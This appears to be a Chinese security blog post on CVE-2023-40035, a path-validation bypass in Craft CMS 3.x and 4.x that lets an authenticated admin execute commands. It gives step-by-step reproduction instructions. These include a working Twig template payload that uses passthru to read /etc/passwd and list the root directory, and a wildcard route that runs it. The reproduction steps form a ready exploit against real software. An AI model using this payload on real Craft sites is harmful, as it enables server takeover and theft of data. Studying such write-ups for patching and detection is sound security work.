简介
Craft 是国外一种灵活、用户友好的 CMS,用于在网络及其他领域创建自定义数字体验。
开发语言:PHP开发框架:Yii 2.x官方网址:https://craftcms.com/源码信息:https://github.com/craftcms/cms
漏洞描述
Craft 是一款用于在网络及其他领域创建自定义数字体验的 CMS。绕过 validatePath 函数可能会导致潜在的远程代码执行。此漏洞可能导致对易受攻击的系统进行恶意控制和数据泄露。尽管该漏洞仅在经过身份验证的用户(配置为 ALLOW_ADMIN_CHANGES=true)中可被利用,但仍然存在潜在的安全威胁(远程执行代码)。
影响版本
4.0.0-RC1 ≤ craftcms ≤ 4.4.143.0.0 ≤ craftcms ≤ 3.8.14
空间测绘
回复“CVE-2023-40035”获取空间测绘搜索语句漏洞利用
漏洞需要配置文件中的“ALLOW_ADMIN_CHANGES”为“true”时才能利用,默认为开启状态
1.点击“Settings”,新建一个Filesystems”,“Base Path”添加以下内容:
file:///var/www/html/templates
2.点击“Settings”,新建一个“Assets”,“Asset Filesystem”选择刚刚新建的“local_bypass”
3.点击“Assets”,然后点击“local_bypass”,上传“poc.ttml”,“poc.ttml”内容如下:
{{'<pre>'}}{{1337*1337}}{{['cat /etc/passwd']|map('passthru')|join}}{{['id;pwd;ls -altr /']|map('passthru')|join}}
4.点击“Settins”,然后点击“New route”新建一个路由,“URI”设置“*”,“Template”设置“poc.ttml”
5.访问随便一个路由执行命令
http://testcms.ddev.site/123
参考链接
https://craftcms.com/https://github.com/craftcms/cms/https://nvd.nist.gov/vuln/detail/CVE-2023-40035https://github.com/craftcms/cms/security/advisories/GHSA-44wr-rmwq-3phw
原文始发于微信公众号(不够安全):CVE-2023-40035:国外CraftCMS后台命令执行 附复现过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论